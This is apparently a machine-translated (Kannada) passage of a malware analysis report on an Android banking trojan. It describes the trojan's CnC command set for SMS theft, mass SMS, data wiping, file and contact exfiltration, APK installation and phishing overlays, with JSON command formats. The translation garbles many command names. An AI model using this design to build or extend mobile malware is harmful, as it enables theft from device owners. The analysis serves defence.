ನೇಮ್ ಜನರೇಟರ್("APPS_INSTALLED") ಸಾಧನದಲ್ಲಿ ಸ್ಥಾಪಿಸಲಾದ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಪಟ್ಟಿಯನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ.
ನೇಮ್ ಜನರೇಟರ್("IS_FIST_RUN") ಮೊದಲ ಪ್ರಾರಂಭದಲ್ಲಿ ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಮರುಹೊಂದಿಸಲಾಗಿದೆ.
ನೇಮ್ ಜನರೇಟರ್("UNIQUE_ID") ಅನನ್ಯ ಗುರುತಿಸುವಿಕೆಯನ್ನು ಒಳಗೊಂಡಿದೆ. ಬೋಟ್ ಅನ್ನು ಮೊದಲ ಬಾರಿಗೆ ಪ್ರಾರಂಭಿಸಿದಾಗ ರಚಿಸಲಾಗಿದೆ.

ಸರ್ವರ್‌ನಿಂದ ಆದೇಶಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸಲು ಮಾಡ್ಯೂಲ್

ಅಪ್ಲಿಕೇಶನ್ ಸಿಎನ್‌ಸಿ ಸರ್ವರ್‌ಗಳ ವಿಳಾಸಗಳನ್ನು ಎನ್‌ಕೋಡ್ ಮಾಡಲಾದ ರಚನೆಯ ರೂಪದಲ್ಲಿ ಸಂಗ್ರಹಿಸುತ್ತದೆ ಬೇಸೆಕ್ಸ್ನಮ್ಕ್ಸ್ ಸಾಲುಗಳು. ಸೂಕ್ತವಾದ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಿದ ನಂತರ CnC ಸರ್ವರ್‌ಗಳ ಪಟ್ಟಿಯನ್ನು ಬದಲಾಯಿಸಬಹುದು, ಈ ಸಂದರ್ಭದಲ್ಲಿ ವಿಳಾಸಗಳನ್ನು ಆದ್ಯತೆಯ ಫೈಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗುತ್ತದೆ.

ವಿನಂತಿಗೆ ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ, ಸರ್ವರ್ ಅಪ್ಲಿಕೇಶನ್‌ಗೆ ಆಜ್ಞೆಯನ್ನು ಕಳುಹಿಸುತ್ತದೆ. ಆಜ್ಞೆಗಳು ಮತ್ತು ನಿಯತಾಂಕಗಳನ್ನು JSON ಸ್ವರೂಪದಲ್ಲಿ ಪ್ರಸ್ತುತಪಡಿಸಲಾಗಿದೆ ಎಂದು ಗಮನಿಸಬೇಕಾದ ಅಂಶವಾಗಿದೆ. ಅಪ್ಲಿಕೇಶನ್ ಕೆಳಗಿನ ಆಜ್ಞೆಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸಬಹುದು:

ತಂಡದ ವಿವರಣೆ
ಫಾರ್ವರ್ಡ್‌ಸ್ಟಾರ್ಟ್ ಸೋಂಕಿತ ಸಾಧನದಿಂದ ಸ್ವೀಕರಿಸಿದ SMS ಸಂದೇಶಗಳನ್ನು CnC ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲು ಪ್ರಾರಂಭಿಸಿ.
ಫಾರ್ವರ್ಡ್ ಸ್ಟಾಪ್ ಸೋಂಕಿತ ಸಾಧನದಿಂದ ಸ್ವೀಕರಿಸಿದ SMS ಸಂದೇಶಗಳನ್ನು CnC ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸುವುದನ್ನು ನಿಲ್ಲಿಸಿ.
ussdRun USSD ವಿನಂತಿಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿ. ನೀವು USSD ವಿನಂತಿಯನ್ನು ಮಾಡಬೇಕಾದ ಸಂಖ್ಯೆಯು JSON ಕ್ಷೇತ್ರ "ಸಂಖ್ಯೆ" ನಲ್ಲಿದೆ.
SMS ಕಳುಹಿಸಿ ಒಂದು SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿ (ಅಗತ್ಯವಿದ್ದರೆ, ಸಂದೇಶವನ್ನು ಭಾಗಗಳಾಗಿ "ವಿಭಜಿಸಲಾಗಿದೆ"). ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ, ಆಜ್ಞೆಯು "ಟು" ಕ್ಷೇತ್ರಗಳನ್ನು ಹೊಂದಿರುವ JSON ವಸ್ತುವನ್ನು ತೆಗೆದುಕೊಳ್ಳುತ್ತದೆ - ಗಮ್ಯಸ್ಥಾನ ಸಂಖ್ಯೆ ಮತ್ತು "ದೇಹ" - ಸಂದೇಶದ ದೇಹ.
SMSAb ಕಳುಹಿಸಿ ಸೋಂಕಿತ ಸಾಧನದ ಸಂಪರ್ಕ ಪಟ್ಟಿಯಲ್ಲಿರುವ ಎಲ್ಲರಿಗೂ SMS ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸಿ (ಅಗತ್ಯವಿದ್ದಲ್ಲಿ, ಸಂದೇಶವು ಭಾಗಗಳಾಗಿ "ವಿಭಜಿಸಲಾಗಿದೆ"). ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸುವ ನಡುವಿನ ಮಧ್ಯಂತರವು 10 ಸೆಕೆಂಡುಗಳು. ಸಂದೇಶದ ದೇಹವು JSON ಕ್ಷೇತ್ರ "ದೇಹ"ದಲ್ಲಿದೆ
ಕಳುಹಿಸುSmsMass ಕಮಾಂಡ್ ಪ್ಯಾರಾಮೀಟರ್‌ಗಳಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಸಂಪರ್ಕಗಳಿಗೆ SMS ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸಿ (ಅಗತ್ಯವಿದ್ದರೆ, ಸಂದೇಶವು ಭಾಗಗಳಾಗಿ "ವಿಭಜಿಸಲಾಗಿದೆ"). ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸುವ ನಡುವಿನ ಮಧ್ಯಂತರವು 10 ಸೆಕೆಂಡುಗಳು. ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ, ಆಜ್ಞೆಯು JSON ರಚನೆಯನ್ನು ತೆಗೆದುಕೊಳ್ಳುತ್ತದೆ (“sms” ಕ್ಷೇತ್ರ), ಅದರ ಅಂಶಗಳು “to” ಕ್ಷೇತ್ರಗಳನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ - ಗಮ್ಯಸ್ಥಾನ ಸಂಖ್ಯೆ ಮತ್ತು “ದೇಹ” - ಸಂದೇಶದ ದೇಹ.
ಬದಲಾವಣೆ ಸರ್ವರ್ ಈ ಆಜ್ಞೆಯು "url" ಕೀಲಿಯೊಂದಿಗೆ ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಮೌಲ್ಯವನ್ನು ತೆಗೆದುಕೊಳ್ಳಬಹುದು - ನಂತರ ಬೋಟ್ ನೇಮ್‌ಜೆನರೇಟರ್ ("SERVER_URL"), ಅಥವಾ "ಅರೇ" ಮೌಲ್ಯವನ್ನು ಬದಲಾಯಿಸುತ್ತದೆ - ನಂತರ ಬೋಟ್ ನೇಮ್‌ಜೆನರೇಟರ್ ("API_SERVER_LIST") ಗೆ ರಚನೆಯನ್ನು ಬರೆಯುತ್ತದೆ. ಹೀಗಾಗಿ, ಅಪ್ಲಿಕೇಶನ್ CnC ಸರ್ವರ್‌ಗಳ ವಿಳಾಸವನ್ನು ಬದಲಾಯಿಸುತ್ತದೆ.
ನಿರ್ವಾಹಕ ಸಂಖ್ಯೆ ಆಜ್ಞೆಯನ್ನು ಮೂಲ ಸಂಖ್ಯೆಯೊಂದಿಗೆ ಕೆಲಸ ಮಾಡಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ಆಜ್ಞೆಯು ಈ ಕೆಳಗಿನ ನಿಯತಾಂಕಗಳೊಂದಿಗೆ JSON ಆಬ್ಜೆಕ್ಟ್ ಅನ್ನು ಸ್ವೀಕರಿಸುತ್ತದೆ: "ಸಂಖ್ಯೆ" - ಸ್ವೀಕರಿಸಿದ ಮೌಲ್ಯಕ್ಕೆ ನೇಮ್‌ಜೆನರೇಟರ್ ("ROOT_NUMBER") ಅನ್ನು ಬದಲಾಯಿಸಿ, "ಮರುಕಳುಹಿಸಿ" - ನೇಮ್‌ಜೆನರೇಟರ್ ಅನ್ನು ಬದಲಾಯಿಸಿ ("SMS_ROOT_NUMBER_RESEND"), "sendId" - ನೇಮ್‌ಜೆನರೇಟರ್‌ಗೆ ಕಳುಹಿಸಿ ("ROOT_NUMBER" ) ಅನನ್ಯ ID.
ಮಾಹಿತಿಯನ್ನು ಆಧುನೀಕರಿಸು ಸೋಂಕಿತ ಸಾಧನದ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಿ.
ಮಾಹಿತಿಯನ್ನು ಅಳಿಸಿ ಆಜ್ಞೆಯು ಬಳಕೆದಾರರ ಡೇಟಾವನ್ನು ಅಳಿಸಲು ಉದ್ದೇಶಿಸಲಾಗಿದೆ. ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಯಾವ ಹೆಸರನ್ನು ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ ಎಂಬುದರ ಆಧಾರದ ಮೇಲೆ, ಸಾಧನದ ರೀಬೂಟ್ (ಪ್ರಾಥಮಿಕ ಬಳಕೆದಾರ) ನೊಂದಿಗೆ ಡೇಟಾವನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಅಳಿಸಲಾಗುತ್ತದೆ ಅಥವಾ ಬಳಕೆದಾರರ ಡೇಟಾವನ್ನು ಮಾತ್ರ ಅಳಿಸಲಾಗುತ್ತದೆ (ದ್ವಿತೀಯ ಬಳಕೆದಾರ).
ಸಾಕ್ಸ್‌ಸ್ಟಾರ್ಟ್ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಿ. ಮಾಡ್ಯೂಲ್ನ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ಪ್ರತ್ಯೇಕ ವಿಭಾಗದಲ್ಲಿ ವಿವರಿಸಲಾಗಿದೆ.
ಸಾಕ್ಸ್ ಸ್ಟಾಪ್ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ನಿಲ್ಲಿಸಿ.
ಓಪನ್ ಲಿಂಕ್ ಲಿಂಕ್ ಅನ್ನು ಅನುಸರಿಸಿ. ಲಿಂಕ್ "url" ಕೀ ಅಡಿಯಲ್ಲಿ JSON ಪ್ಯಾರಾಮೀಟರ್‌ನಲ್ಲಿದೆ. "android.intent.action.VIEW" ಅನ್ನು ಲಿಂಕ್ ತೆರೆಯಲು ಬಳಸಲಾಗುತ್ತದೆ.
ಅಪ್ಲೋಡ್AllSms ಸಾಧನವು ಸ್ವೀಕರಿಸಿದ ಎಲ್ಲಾ SMS ಸಂದೇಶಗಳನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಿ.
ಎಲ್ಲಾ ಫೋಟೋಗಳನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡಿ ಸೋಂಕಿತ ಸಾಧನದಿಂದ URL ಗೆ ಚಿತ್ರಗಳನ್ನು ಕಳುಹಿಸಿ. URL ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಬರುತ್ತದೆ.
ಫೈಲ್ ಅನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡಿ ಸೋಂಕಿತ ಸಾಧನದಿಂದ URL ಗೆ ಫೈಲ್ ಅನ್ನು ಕಳುಹಿಸಿ. URL ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಬರುತ್ತದೆ.
ಫೋನ್ ಸಂಖ್ಯೆಗಳನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡಿ ನಿಮ್ಮ ಸಂಪರ್ಕ ಪಟ್ಟಿಯಿಂದ ಫೋನ್ ಸಂಖ್ಯೆಗಳನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಿ. "ab" ಕೀಲಿಯೊಂದಿಗೆ JSON ವಸ್ತುವಿನ ಮೌಲ್ಯವನ್ನು ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಸ್ವೀಕರಿಸಿದರೆ, ಅಪ್ಲಿಕೇಶನ್ ಫೋನ್ ಪುಸ್ತಕದಿಂದ ಸಂಪರ್ಕಗಳ ಪಟ್ಟಿಯನ್ನು ಸ್ವೀಕರಿಸುತ್ತದೆ. "sms" ಕೀ ಇರುವ JSON ಆಬ್ಜೆಕ್ಟ್ ಅನ್ನು ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಸ್ವೀಕರಿಸಿದರೆ, ಅಪ್ಲಿಕೇಶನ್ SMS ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸುವವರ ಸಂಪರ್ಕಗಳ ಪಟ್ಟಿಯನ್ನು ಓದುತ್ತದೆ.
ಆರ್ಕೈವ್ ಅನ್ನು ಬದಲಿಸಿ ಅಪ್ಲಿಕೇಶನ್ "url" ಕೀಲಿಯನ್ನು ಬಳಸಿಕೊಂಡು ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಬರುವ ವಿಳಾಸದಿಂದ ಫೈಲ್ ಅನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡುತ್ತದೆ. ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ಫೈಲ್ ಅನ್ನು "archive.zip" ಹೆಸರಿನೊಂದಿಗೆ ಉಳಿಸಲಾಗಿದೆ. ಅಪ್ಲಿಕೇಶನ್ ನಂತರ ಫೈಲ್ ಅನ್ನು ಅನ್ಜಿಪ್ ಮಾಡುತ್ತದೆ, ಐಚ್ಛಿಕವಾಗಿ ಆರ್ಕೈವ್ ಪಾಸ್ವರ್ಡ್ "b5jXh37gxgHBrZhQ4j3D" ಅನ್ನು ಬಳಸುತ್ತದೆ. ಅನ್ಜಿಪ್ ಮಾಡಲಾದ ಫೈಲ್‌ಗಳನ್ನು [ಬಾಹ್ಯ ಸಂಗ್ರಹಣೆ]/hgps ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ ಉಳಿಸಲಾಗಿದೆ. ಈ ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ, ಅಪ್ಲಿಕೇಶನ್ ವೆಬ್ ನಕಲಿಗಳನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ (ಕೆಳಗೆ ವಿವರಿಸಲಾಗಿದೆ).
ಕ್ರಮಗಳು ಆಕ್ಷನ್ ಸೇವೆಯೊಂದಿಗೆ ಕೆಲಸ ಮಾಡಲು ಆಜ್ಞೆಯನ್ನು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ, ಇದನ್ನು ಪ್ರತ್ಯೇಕ ವಿಭಾಗದಲ್ಲಿ ವಿವರಿಸಲಾಗಿದೆ.
ಟೆಸ್ಟ್ ಏನನ್ನೂ ಮಾಡುತ್ತಿಲ್ಲ.
ಡೌನ್ಲೋಡ್ ಆಜ್ಞೆಯು ರಿಮೋಟ್ ಸರ್ವರ್‌ನಿಂದ ಫೈಲ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ಮತ್ತು ಅದನ್ನು "ಡೌನ್‌ಲೋಡ್‌ಗಳು" ಡೈರೆಕ್ಟರಿಗೆ ಉಳಿಸಲು ಉದ್ದೇಶಿಸಲಾಗಿದೆ. URL ಮತ್ತು ಫೈಲ್ ಹೆಸರು ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಬರುತ್ತದೆ, ಅನುಕ್ರಮವಾಗಿ JSON ಪ್ಯಾರಾಮೀಟರ್ ಆಬ್ಜೆಕ್ಟ್‌ನಲ್ಲಿ ಕ್ಷೇತ್ರಗಳು: “url” ಮತ್ತು “fileName”.
ತೆಗೆದು "ಡೌನ್‌ಲೋಡ್‌ಗಳು" ಡೈರೆಕ್ಟರಿಯಿಂದ ಫೈಲ್ ಅನ್ನು ತೆಗೆದುಹಾಕುತ್ತದೆ. ಫೈಲ್ ಹೆಸರು "fileName" ಕೀಲಿಯೊಂದಿಗೆ JSON ಪ್ಯಾರಾಮೀಟರ್‌ನಲ್ಲಿ ಬರುತ್ತದೆ. ಪ್ರಮಾಣಿತ ಫೈಲ್ ಹೆಸರು "tmp.apk" ಆಗಿದೆ.
ಅಧಿಸೂಚನೆ ನಿರ್ವಹಣಾ ಸರ್ವರ್‌ನಿಂದ ವ್ಯಾಖ್ಯಾನಿಸಲಾದ ವಿವರಣೆ ಮತ್ತು ಶೀರ್ಷಿಕೆ ಪಠ್ಯಗಳೊಂದಿಗೆ ಅಧಿಸೂಚನೆಯನ್ನು ತೋರಿಸಿ.

ಕಮಾಂಡ್ ಫಾರ್ಮ್ಯಾಟ್ ಅಧಿಸೂಚನೆ:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

ತನಿಖೆಯಲ್ಲಿರುವ ಫೈಲ್‌ನಿಂದ ರಚಿಸಲಾದ ಅಧಿಸೂಚನೆಯು ಕ್ಷೇತ್ರದಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಅಪ್ಲಿಕೇಶನ್‌ನಿಂದ ರಚಿಸಲಾದ ಅಧಿಸೂಚನೆಗಳಿಗೆ ಹೋಲುತ್ತದೆ ಅಪ್ಲಿಕೇಶನ್. ಕ್ಷೇತ್ರದ ಮೌಲ್ಯವಾಗಿದ್ದರೆ openApp - ನಿಜ, ಅಧಿಸೂಚನೆಯನ್ನು ತೆರೆದಾಗ, ಕ್ಷೇತ್ರದಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲಾಗುತ್ತದೆ ಅಪ್ಲಿಕೇಶನ್. ಕ್ಷೇತ್ರದ ಮೌಲ್ಯವಾಗಿದ್ದರೆ openApp - ತಪ್ಪು, ನಂತರ:

  • ಫಿಶಿಂಗ್ ವಿಂಡೋ ತೆರೆಯುತ್ತದೆ, ಅದರ ವಿಷಯಗಳನ್ನು ಡೈರೆಕ್ಟರಿಯಿಂದ ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ <%ಬಾಹ್ಯ ಸಂಗ್ರಹಣೆ%>/hgps/<%filename%>
  • ಫಿಶಿಂಗ್ ವಿಂಡೋ ತೆರೆಯುತ್ತದೆ, ಅದರ ವಿಷಯಗಳನ್ನು ಸರ್ವರ್‌ನಿಂದ ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ <%url%>?id=<%Bot id%>&app=<%ಅಪ್ಲಿಕೇಶನ್ ಹೆಸರು%>
  • ಕಾರ್ಡ್ ವಿವರಗಳನ್ನು ನಮೂದಿಸುವ ಅವಕಾಶದೊಂದಿಗೆ ಗೂಗಲ್ ಪ್ಲೇ ಕಾರ್ಡ್‌ನಂತೆ ವೇಷ ಧರಿಸಿ ಫಿಶಿಂಗ್ ವಿಂಡೋ ತೆರೆಯುತ್ತದೆ.

ಅಪ್ಲಿಕೇಶನ್ ಯಾವುದೇ ಆಜ್ಞೆಯ ಫಲಿತಾಂಶವನ್ನು ಕಳುಹಿಸುತ್ತದೆ <%CnC%>set_state.php ಕೆಳಗಿನ ಸ್ವರೂಪದಲ್ಲಿ JSON ವಸ್ತುವಾಗಿ:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ಕ್ರಿಯೆಗಳ ಸೇವೆ
ಅಪ್ಲಿಕೇಶನ್ ಪ್ರಕ್ರಿಯೆಗಳು ಒಳಗೊಂಡಿರುವ ಆಜ್ಞೆಗಳ ಪಟ್ಟಿ ಕ್ರಮ. ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ, ಕಮಾಂಡ್ ಪ್ರೊಸೆಸಿಂಗ್ ಮಾಡ್ಯೂಲ್ ವಿಸ್ತೃತ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಈ ಸೇವೆಯನ್ನು ಪ್ರವೇಶಿಸುತ್ತದೆ. ಸೇವೆಯು JSON ವಸ್ತುವನ್ನು ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಸ್ವೀಕರಿಸುತ್ತದೆ. ಸೇವೆಯು ಈ ಕೆಳಗಿನ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು:

1. PARAMS_ACTION - ಅಂತಹ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸುವಾಗ, ಸೇವೆಯು ಮೊದಲು JSON ಪ್ಯಾರಾಮೀಟರ್‌ನಿಂದ ಟೈಪ್ ಕೀಲಿಯ ಮೌಲ್ಯವನ್ನು ಪಡೆಯುತ್ತದೆ, ಅದು ಈ ಕೆಳಗಿನಂತಿರಬಹುದು:

  • ಸೇವಾ ಮಾಹಿತಿ - ಉಪಕಮಾಂಡ್ JSON ಪ್ಯಾರಾಮೀಟರ್‌ನಿಂದ ಕೀ ಮೂಲಕ ಮೌಲ್ಯವನ್ನು ಪಡೆಯುತ್ತದೆ ಪ್ರಮುಖವಲ್ಲ. ಫ್ಲ್ಯಾಗ್ ನಿಜವಾಗಿದ್ದರೆ, ಅಪ್ಲಿಕೇಶನ್ ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸುತ್ತದೆ FLAG_ISOLATED_PROCESS ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸೇವೆಗೆ. ಈ ರೀತಿಯಲ್ಲಿ ಸೇವೆಯನ್ನು ಪ್ರತ್ಯೇಕ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ಪ್ರಾರಂಭಿಸಲಾಗುವುದು.
  • ಬೇರು — ಪ್ರಸ್ತುತ ಫೋಕಸ್ ಆಗಿರುವ ವಿಂಡೋದ ಬಗ್ಗೆ ಸರ್ವರ್ ಮಾಹಿತಿಯನ್ನು ಸ್ವೀಕರಿಸಿ ಮತ್ತು ಕಳುಹಿಸಿ. ಅಪ್ಲಿಕೇಶನ್ ಆಕ್ಸೆಸಿಬಿಲಿಟಿನೋಡ್ಇನ್ಫೋ ವರ್ಗವನ್ನು ಬಳಸಿಕೊಂಡು ಮಾಹಿತಿಯನ್ನು ಪಡೆಯುತ್ತದೆ.
  • ನಿರ್ವಹಣೆ - ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳನ್ನು ವಿನಂತಿಸಿ.
  • ವಿಳಂಬ — "ಡೇಟಾ" ಕೀಲಿಗಾಗಿ ಪ್ಯಾರಾಮೀಟರ್‌ನಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಮಿಲಿಸೆಕೆಂಡ್‌ಗಳ ಸಂಖ್ಯೆಗೆ ಕ್ರಿಯೆಗಳ ಸೇವೆಯನ್ನು ಅಮಾನತುಗೊಳಿಸಿ.
  • ವಿಂಡೋಸ್ - ಬಳಕೆದಾರರಿಗೆ ಗೋಚರಿಸುವ ವಿಂಡೋಗಳ ಪಟ್ಟಿಯನ್ನು ಕಳುಹಿಸಿ.
  • ಅನುಸ್ಥಾಪಿಸು - ಸೋಂಕಿತ ಸಾಧನದಲ್ಲಿ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸಿ. ಆರ್ಕೈವ್ ಪ್ಯಾಕೇಜ್‌ನ ಹೆಸರು "ಫೈಲ್ ನೇಮ್" ಕೀಲಿಯಲ್ಲಿದೆ. ಆರ್ಕೈವ್ ಸ್ವತಃ ಡೌನ್‌ಲೋಡ್‌ಗಳ ಡೈರೆಕ್ಟರಿಯಲ್ಲಿದೆ.
  • ಜಾಗತಿಕ - ಉಪಕಮಾಂಡ್ ಪ್ರಸ್ತುತ ವಿಂಡೋದಿಂದ ನ್ಯಾವಿಗೇಟ್ ಮಾಡಲು ಉದ್ದೇಶಿಸಲಾಗಿದೆ:
    • ತ್ವರಿತ ಸೆಟ್ಟಿಂಗ್‌ಗಳ ಮೆನುವಿನಲ್ಲಿ
    • ಹಿಂದುಳಿದ
    • ಮನೆ
    • ಅಧಿಸೂಚನೆಗಳಿಗೆ
    • ಇತ್ತೀಚೆಗೆ ತೆರೆದ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ವಿಂಡೋಗೆ

  • ಬಿಡುಗಡೆ - ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಿ. ಅಪ್ಲಿಕೇಶನ್ ಹೆಸರು ಕೀಲಿಯಿಂದ ಪ್ಯಾರಾಮೀಟರ್ ಆಗಿ ಬರುತ್ತದೆ ಡೇಟಾ.
  • ಶಬ್ದಗಳ - ಧ್ವನಿ ಮೋಡ್ ಅನ್ನು ಮೌನಕ್ಕೆ ಬದಲಾಯಿಸಿ.
  • ಅನ್ಲಾಕ್ - ಪರದೆಯ ಮತ್ತು ಕೀಬೋರ್ಡ್‌ನ ಹಿಂಬದಿ ಬೆಳಕನ್ನು ಪೂರ್ಣ ಹೊಳಪಿಗೆ ಆನ್ ಮಾಡುತ್ತದೆ. ಅಪ್ಲಿಕೇಶನ್ ವೇಕ್‌ಲಾಕ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು ಈ ಕ್ರಿಯೆಯನ್ನು ಮಾಡುತ್ತದೆ, ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತದೆ [ಅಪ್ಲಿಕೇಶನ್ ಲೇಬಲ್]: INFO ಅನ್ನು ಟ್ಯಾಗ್ ಆಗಿ
  • ಅನುಮತಿಯ ಮೇಲ್ಪದರ — ಕಾರ್ಯವನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗಿಲ್ಲ (ಕಮಾಂಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್‌ಗೆ ಪ್ರತಿಕ್ರಿಯೆಯು {"ಸಂದೇಶ":"ಬೆಂಬಲವಿಲ್ಲ"} ಅಥವಾ {"ಸಂದೇಶ":"ಲೋ sdk"})
  • ಗೆಸ್ಚರ್ — ಕಾರ್ಯವನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗಿಲ್ಲ (ಕಮಾಂಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್‌ಗೆ ಪ್ರತಿಕ್ರಿಯೆಯು {"ಸಂದೇಶ":"ಬೆಂಬಲವಿಲ್ಲ"}ಅಥವಾ {"ಸಂದೇಶ":"ಕಡಿಮೆ API"})
  • ಅನುಮತಿಗಳು - ಅಪ್ಲಿಕೇಶನ್‌ಗೆ ಅನುಮತಿಗಳನ್ನು ವಿನಂತಿಸಲು ಈ ಆಜ್ಞೆಯು ಅವಶ್ಯಕವಾಗಿದೆ. ಆದಾಗ್ಯೂ, ಪ್ರಶ್ನೆ ಕಾರ್ಯವನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗಿಲ್ಲ, ಆದ್ದರಿಂದ ಆಜ್ಞೆಯು ಅರ್ಥಹೀನವಾಗಿದೆ. ವಿನಂತಿಸಿದ ಹಕ್ಕುಗಳ ಪಟ್ಟಿಯು "ಅನುಮತಿಗಳು" ಕೀಲಿಯೊಂದಿಗೆ JSON ರಚನೆಯಾಗಿ ಬರುತ್ತದೆ. ಪ್ರಮಾಣಿತ ಪಟ್ಟಿ:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • ತೆರೆದ - ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ಪ್ರದರ್ಶಿಸಿ. ಸರ್ವರ್‌ನಿಂದ ಬರುವ ನಿಯತಾಂಕವನ್ನು ಅವಲಂಬಿಸಿ, ಅಪ್ಲಿಕೇಶನ್ ಕೆಳಗಿನ ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳನ್ನು ಪ್ರದರ್ಶಿಸಬಹುದು:
    • ಡೈರೆಕ್ಟರಿಯಲ್ಲಿರುವ ಫೈಲ್‌ನಲ್ಲಿ ವಿಷಯಗಳನ್ನು ಬರೆಯಲಾದ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ತೋರಿಸಿ <%ಬಾಹ್ಯ ಡೈರೆಕ್ಟರಿ%>/hgps/<%param_filename%>. ವಿಂಡೋದೊಂದಿಗೆ ಬಳಕೆದಾರರ ಸಂವಹನದ ಫಲಿತಾಂಶವನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ <%CnC%>/records.php
    • ವಿಳಾಸದಿಂದ ವಿಷಯಗಳನ್ನು ಮೊದಲೇ ಲೋಡ್ ಮಾಡಲಾದ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ತೋರಿಸಿ <%url_param%>?id=<%bot_id%>&app=<%packagename%>. ವಿಂಡೋದೊಂದಿಗೆ ಬಳಕೆದಾರರ ಸಂವಹನದ ಫಲಿತಾಂಶವನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ <%CnC%>/records.php
